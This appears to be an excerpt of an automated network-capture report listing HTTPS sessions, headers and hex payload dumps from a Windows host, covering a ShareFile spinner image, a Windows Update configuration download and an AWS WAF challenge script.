                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 5b 30 5d 3e 74 68 69 73 2e 6d 69 64 29 74 68 69 73 2e 72 69 67 68 74 3f 34 2a 28 74 68 69 73 2e 72 69 67 68 74 2e 63 6f 75 6e 74 2b 31 29 3e 33 2a 28 74 2b 31 29 3f 4b 65 28 74 68 69 73 2c 65 29 3a 74 68 69 73 2e 72 69 67 68 74 2e 69 6e 73 65 72 74 28 65 29 3a 74 68 69 73 2e 72 69 67 68 74 3d 72 74 28 5b 65 5d 29 3b 65 6c 73 65 7b 76 61 72 20 6e 3d 55 65 2e 67 65 28 74 68 69 73 2e 6c 65 66 74 50 6f 69 6e 74 73 2c 65 2c 74 74 29 2c 72 3d 55 65 2e 67 65 28 74 68 69 73 2e 72 69 67 68 74 50 6f 69 6e 74 73 2c 65 2c 6e 74 29 3b 74 68 69 73 2e 6c 65 66 74 50 6f 69 6e 74 73 2e 73 70 6c 69 63 65 28 6e 2c 30 2c 65 29 2c 74 68 69 73 2e 72 69 67 68 74 50 6f 69 6e 74 73 2e 73 70 6c 69 63 65 28 72 2c 30 2c 65 29 7d 7d 2c 71 65 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                      Data Ascii: [0]>this.mid)this.right?4*(this.right.count+1)>3*(t+1)?Ke(this,e):this.right.insert(e):this.right=rt([e]);else{var n=Ue.ge(this.leftPoints,e,tt),r=Ue.ge(this.rightPoints,e,nt);this.leftPoints.splice(n,0,e),this.rightPoints.splice(r,0,e)}},qe.remove=functi
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC16384INData Raw: 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 4c 65 66 74 47 72 69 64 26 26 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 4c 65 66 74 47 72 69 64 2e 6d 65 61 73 75 72 65 41 6c 6c 43 65 6c 6c 73 28 29 2c 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 52 69 67 68 74 47 72 69 64 26 26 74 68 69 73 2e 5f 62 6f 74 74 6f 6d 52 69 67 68 74 47 72 69 64 2e 6d 65 61 73 75 72 65 41 6c 6c 43 65 6c 6c 73 28 29 2c 74 68 69 73 2e 5f 74 6f 70 4c 65 66 74 47 72 69 64 26 26 74 68 69 73 2e 5f 74 6f 70 4c 65 66 74 47 72 69 64 2e 6d 65 61 73 75 72 65 41 6c 6c 43 65 6c 6c 73 28 29 2c 74 68 69 73 2e 5f 74 6f 70 52 69 67 68 74 47 72 69 64 26 26 74 68 69 73 2e 5f 74 6f 70 52 69 67 68 74 47 72 69 64 2e 6d 65 61 73 75 72 65 41 6c 6c 43 65 6c 6c 73 28 29 7d 7d 2c 7b 6b
                                                                                                                                                                                                                      Data Ascii: lue:function(){this._bottomLeftGrid&&this._bottomLeftGrid.measureAllCells(),this._bottomRightGrid&&this._bottomRightGrid.measureAllCells(),this._topLeftGrid&&this._topLeftGrid.measureAllCells(),this._topRightGrid&&this._topRightGrid.measureAllCells()}},{k


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      4192.168.2.174971013.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC1299OUTGET /css/sharefilebrand/sf-spinner.svg HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/css/spinner.css
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=7NQ3qANfjcNldCo/D4VMWzza0f2Ig2K578l4QPO+SFkRrjyy9dLqkGQT+GQvw1nxDQ2gbRf2R3sFiz+nU8KPPgRXkh9up5qd6UlKw4ju+UYjlY/qW0U3hx48V/T+BTDd+zbPNf3YFKiFl5yZRq2W/1PTyeeoIKFhTUa670lN9fV9; AWSALBTGCORS=7NQ3qANfjcNldCo/D4VMWzza0f2Ig2K578l4QPO+SFkRrjyy9dLqkGQT+GQvw1nxDQ2gbRf2R3sFiz+nU8KPPgRXkh9up5qd6UlKw4ju+UYjlY/qW0U3hx48V/T+BTDd+zbPNf3YFKiFl5yZRq2W/1PTyeeoIKFhTUa670lN9fV9; AWSALB=baEYrqmkfpbdO40bTHu3knPMluYu0f11/b6erumHx8FhurkHe+iMOzF04ujcT0DR2AO1Fo8OXcyUTWyA5nJJ/4lOqZQYIasGrQxs4n4o0dLMgbYhJ2trDQ8iDz+g; AWSALBCORS=baEYrqmkfpbdO40bTHu3knPMluYu0f11/b6erumHx8FhurkHe+iMOzF04ujcT0DR2AO1Fo8OXcyUTWyA5nJJ/4lOqZQYIasGrQxs4n4o0dLMgbYhJ2trDQ8iDz+g
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC1419INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:00 GMT
                                                                                                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                                                                                                      Content-Length: 872
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=ecD9TD9PpQrkOP8zmk39anGSgBXdcZ4lsvLNWSixtmxOj/ry6gI1jOBmA3pTVqe6OOwVOERBcmHTtHSfzUHEUqj/rhELyaYC1F3p9XCNELYP59KRyqe5w1tgyRw5W/dBC2A0Gz614h+8KKi7Rui226xdlJyz9+toEtrqguE3aEm/; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=ecD9TD9PpQrkOP8zmk39anGSgBXdcZ4lsvLNWSixtmxOj/ry6gI1jOBmA3pTVqe6OOwVOERBcmHTtHSfzUHEUqj/rhELyaYC1F3p9XCNELYP59KRyqe5w1tgyRw5W/dBC2A0Gz614h+8KKi7Rui226xdlJyz9+toEtrqguE3aEm/; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=qM5qVNEQoVWApP4i/0hGLJQ+y2y/9wU9ARjJSxbLv61ZHD9jcQx3vlEcN/GLvfuUbUaIla0Z7p7whjrNM+HLkO7F+9fGis674jOEFv++6ls1xhg+XUJSz+5hWST7; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=qM5qVNEQoVWApP4i/0hGLJQ+y2y/9wU9ARjJSxbLv61ZHD9jcQx3vlEcN/GLvfuUbUaIla0Z7p7whjrNM+HLkO7F+9fGis674jOEFv++6ls1xhg+XUJSz+5hWST7; Expires=Tue, 12 Nov 2024 19:36:00 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2ce8"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC872INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 0a 09 77 69 64 74 68 3d 22 31 65 6d 22 0a 09 68 65 69 67 68 74 3d 22 31 65 6d 22 0a 09 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 0a 09 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 38 20 32 34 30 22 0a 09 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 3e 0a 09 3c 70 61 74 68 20 64 3d 22 4d 39 38 2e 37 35 37 37 20 31 36 32 2e 39 38 34 4c 36 36 2e 36 39 37 31 20 32 31 38 2e 35 31 34 4c 35 33 2e 36 34 39 31 20 32 31 30 2e 39 37 33 4c 35 31 2e 39 37 31 35 20 32 31 30 2e 30 30 37 4c 36 39 2e 32 38 39 37 20 31 38 30 2e 30 31 34 48 30 56 31 36 32 2e 39 38 34 48 39
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svgwidth="1em"height="1em"fill="currentColor"viewBox="0 0 208 240"xmlns="http://www.w3.org/2000/svg"><path d="M98.7577 162.984L66.6971 218.514L53.6491 210.973L51.9715 210.007L69.2897 180.014H0V162.984H9


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      5192.168.2.174971320.12.23.50443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=z4zFrrzf2way3o4&MD=RMe6SWZc HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                      MS-CorrelationId: 26dc32e4-0950-4b06-9377-80771f341e74
                                                                                                                                                                                                                      MS-RequestId: b0dac046-42ff-42e4-8dc0-cf998b881118
                                                                                                                                                                                                                      MS-CV: os9zFEjVKUixRgY/.0
                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:01 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      6192.168.2.174971576.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC1034OUTGET /css/sharefilebrand/sf-spinner.svg HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=ecD9TD9PpQrkOP8zmk39anGSgBXdcZ4lsvLNWSixtmxOj/ry6gI1jOBmA3pTVqe6OOwVOERBcmHTtHSfzUHEUqj/rhELyaYC1F3p9XCNELYP59KRyqe5w1tgyRw5W/dBC2A0Gz614h+8KKi7Rui226xdlJyz9+toEtrqguE3aEm/; AWSALBTGCORS=ecD9TD9PpQrkOP8zmk39anGSgBXdcZ4lsvLNWSixtmxOj/ry6gI1jOBmA3pTVqe6OOwVOERBcmHTtHSfzUHEUqj/rhELyaYC1F3p9XCNELYP59KRyqe5w1tgyRw5W/dBC2A0Gz614h+8KKi7Rui226xdlJyz9+toEtrqguE3aEm/; AWSALB=qM5qVNEQoVWApP4i/0hGLJQ+y2y/9wU9ARjJSxbLv61ZHD9jcQx3vlEcN/GLvfuUbUaIla0Z7p7whjrNM+HLkO7F+9fGis674jOEFv++6ls1xhg+XUJSz+5hWST7; AWSALBCORS=qM5qVNEQoVWApP4i/0hGLJQ+y2y/9wU9ARjJSxbLv61ZHD9jcQx3vlEcN/GLvfuUbUaIla0Z7p7whjrNM+HLkO7F+9fGis674jOEFv++6ls1xhg+XUJSz+5hWST7
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC1419INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:02 GMT
                                                                                                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                                                                                                      Content-Length: 872
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; Expires=Tue, 12 Nov 2024 19:36:01 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; Expires=Tue, 12 Nov 2024 19:36:01 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; Expires=Tue, 12 Nov 2024 19:36:01 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; Expires=Tue, 12 Nov 2024 19:36:01 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2ce8"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC872INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 0a 09 77 69 64 74 68 3d 22 31 65 6d 22 0a 09 68 65 69 67 68 74 3d 22 31 65 6d 22 0a 09 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 0a 09 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 38 20 32 34 30 22 0a 09 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 3e 0a 09 3c 70 61 74 68 20 64 3d 22 4d 39 38 2e 37 35 37 37 20 31 36 32 2e 39 38 34 4c 36 36 2e 36 39 37 31 20 32 31 38 2e 35 31 34 4c 35 33 2e 36 34 39 31 20 32 31 30 2e 39 37 33 4c 35 31 2e 39 37 31 35 20 32 31 30 2e 30 30 37 4c 36 39 2e 32 38 39 37 20 31 38 30 2e 30 31 34 48 30 56 31 36 32 2e 39 38 34 48 39
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svgwidth="1em"height="1em"fill="currentColor"viewBox="0 0 208 240"xmlns="http://www.w3.org/2000/svg"><path d="M98.7577 162.984L66.6971 218.514L53.6491 210.973L51.9715 210.007L69.2897 180.014H0V162.984H9


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      7192.168.2.174971418.239.18.504437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:01 UTC550OUTGET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                      Content-Length: 1099135
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:02 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a2-1d6f2def0117cd8920cb364f
                                                                                                                                                                                                                      cache-control: private, max-age=86400, stale-while-revalidate=604800
                                                                                                                                                                                                                      last-modified: Tue, 5 Nov 2024 19:36:02 +0000
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 c88ca2a75ca16a71cee4beefb2f6e6b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: VdiSAD0z5UcvVZZCQjvvepATqDVgOOjAryxA14vUa3mckTWqW4LUlA==
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC7842INData Raw: 76 61 72 20 61 30 5f 30 78 34 39 62 37 3d 5b 27 4d 41 58 5f 41 47 45 5f 53 45 43 4f 4e 44 53 27 2c 27 7b 32 38 33 38 30 37 42 35 2d 32 43 36 30 2d 31 31 44 30 2d 41 33 31 44 2d 30 30 41 41 30 30 42 39 32 43 30 33 7d 27 2c 27 73 74 61 72 74 44 65 63 72 79 70 74 69 6e 67 27 2c 27 73 69 67 6e 65 64 44 61 74 61 56 61 6c 69 64 61 74 6f 72 27 2c 27 43 6f 75 6c 64 5c 78 32 30 6e 6f 74 5c 78 32 30 63 6f 6d 70 75 74 65 5c 78 32 30 63 65 72 74 69 66 69 63 61 74 65 5c 78 32 30 64 69 67 65 73 74 2e 5c 78 32 30 55 6e 6b 6e 6f 77 6e 5c 78 32 30 6d 65 73 73 61 67 65 5c 78 32 30 64 69 67 65 73 74 5c 78 32 30 61 6c 67 6f 72 69 74 68 6d 5c 78 32 30 4f 49 44 2e 27 2c 27 4c 65 66 74 6d 6f 73 74 5c 78 32 30 6f 63 74 65 74 73 5c 78 32 30 6e 6f 74 5c 78 32 30 7a 65 72 6f 5c 78
                                                                                                                                                                                                                      Data Ascii: var a0_0x49b7=['MAX_AGE_SECONDS','{283807B5-2C60-11D0-A31D-00AA00B92C03}','startDecrypting','signedDataValidator','Could\x20not\x20compute\x20certificate\x20digest.\x20Unknown\x20message\x20digest\x20algorithm\x20OID.','Leftmost\x20octets\x20not\x20zero\x
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC781INData Raw: 61 70 52 73 61 50 72 69 76 61 74 65 4b 65 79 27 2c 27 4f 43 52 5c 78 32 30 41 5c 78 32 30 45 78 74 65 6e 64 65 64 27 2c 27 54 61 68 6f 6d 61 27 2c 27 70 75 62 6c 69 63 4b 65 79 45 78 70 6f 6e 65 6e 74 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 73 27 2c 27 43 4f 4c 4c 45 43 54 4f 52 53 27 2c 27 45 72 61 73 5c 78 32 30 42 6f 6c 64 5c 78 32 30 49 54 43 27 2c 27 43 6f 75 6c 64 5c 78 32 30 6e 6f 74 5c 78 32 30 70 61 72 73 65 5c 78 32 30 63 65 72 74 69 66 69 63 61 74 65 5c 78 32 30 6c 69 73 74 2e 27 2c 27 68 61 6e 64 6c 65 46 69 6e 69 73 68 65 64 27 2c 27 61 70 70 6c 79 27 2c 27 33 37 74 79 79 50 4f 56 27 2c 27 6d 65 73 73 61 67 65 4c 65 6e 67 74 68 27 2c 27 5c 78 32 30 28 55 54 46 38 29 27 2c 27 49 6e 76 61 6c 69 64 5c 78 32 30 4b 65 79 2e 27 2c 27 64 65 72
                                                                                                                                                                                                                      Data Ascii: apRsaPrivateKey','OCR\x20A\x20Extended','Tahoma','publicKeyExponent','setAttributes','COLLECTORS','Eras\x20Bold\x20ITC','Could\x20not\x20parse\x20certificate\x20list.','handleFinished','apply','37tyyPOV','messageLength','\x20(UTF8)','Invalid\x20Key.','der
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC16384INData Raw: 72 74 2e 27 2c 27 4f 42 46 55 53 43 41 54 4f 52 53 27 2c 27 73 68 61 35 31 32 2f 32 35 36 27 2c 27 64 6f 45 6e 63 72 79 70 74 27 2c 27 63 68 61 6c 6c 65 6e 67 65 50 72 6f 66 69 6c 65 72 43 61 6c 6c 43 6f 75 6e 74 27 2c 27 4a 75 69 63 65 5c 78 32 30 49 54 43 27 2c 27 69 73 43 6f 6d 70 6f 6e 65 6e 74 49 6e 73 74 61 6c 6c 65 64 27 2c 27 63 72 65 61 74 65 53 65 72 76 65 72 4b 65 79 45 78 63 68 61 6e 67 65 27 2c 27 61 6e 64 27 2c 27 61 72 63 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 6d 61 74 63 68 27 2c 27 35 32 32 39 4c 72 73 6f 73 73 27 2c 27 65 6e 63 72 79 70 74 52 73 61 50 72 69 76 61 74 65 4b 65 79 27 2c 27 49 6e 76 61 6c 69 64 5c 78 32 30 6b 65 79 5c 78 32 30 67 65 6e 65 72 61 74 69 6f 6e 5c 78 32 30 61 6c 67 6f 72 69 74 68 6d 3a 5c 78 32 30
                                                                                                                                                                                                                      Data Ascii: rt.','OBFUSCATORS','sha512/256','doEncrypt','challengeProfilerCallCount','Juice\x20ITC','isComponentInstalled','createServerKeyExchange','and','arc','setAttribute','match','5229Lrsoss','encryptRsaPrivateKey','Invalid\x20key\x20generation\x20algorithm:\x20
                                                                                                                                                                                                                      2024-11-05 19:36:02 UTC16384INData Raw: 4b 65 79 54 6f 50 65 6d 27 2c 27 63 6f 6d 70 72 65 73 73 69 6f 6e 5f 6d 65 74 68 6f 64 27 2c 27 50 4f 53 54 27 2c 27 4e 4f 5f 4c 45 56 45 4c 5f 43 48 45 43 4b 27 2c 27 63 72 65 61 74 65 43 65 72 74 69 66 69 63 61 74 65 56 65 72 69 66 79 27 2c 27 4d 53 5c 78 32 30 47 6f 74 68 69 63 27 2c 27 6e 6f 64 65 46 77 63 69 6d 27 2c 27 4b 6f 7a 75 6b 61 5c 78 32 30 4d 69 6e 63 68 6f 5c 78 32 30 50 72 36 4e 5c 78 32 30 42 27 2c 27 66 6c 69 70 42 69 74 27 2c 27 41 6c 65 72 74 27 2c 27 46 6f 72 6d 4d 65 74 68 6f 64 43 6f 6c 6c 65 63 74 6f 72 27 2c 27 6d 61 6a 6f 72 27 2c 27 63 6f 72 65 73 27 2c 27 6d 6f 75 73 65 43 79 63 6c 65 73 27 2c 27 63 6f 6e 73 6f 6c 65 4c 6f 67 67 65 72 27 2c 27 73 69 67 6e 65 64 41 6e 64 45 6e 76 65 6c 6f 70 65 64 44 61 74 61 27 2c 27 5f 5f 77
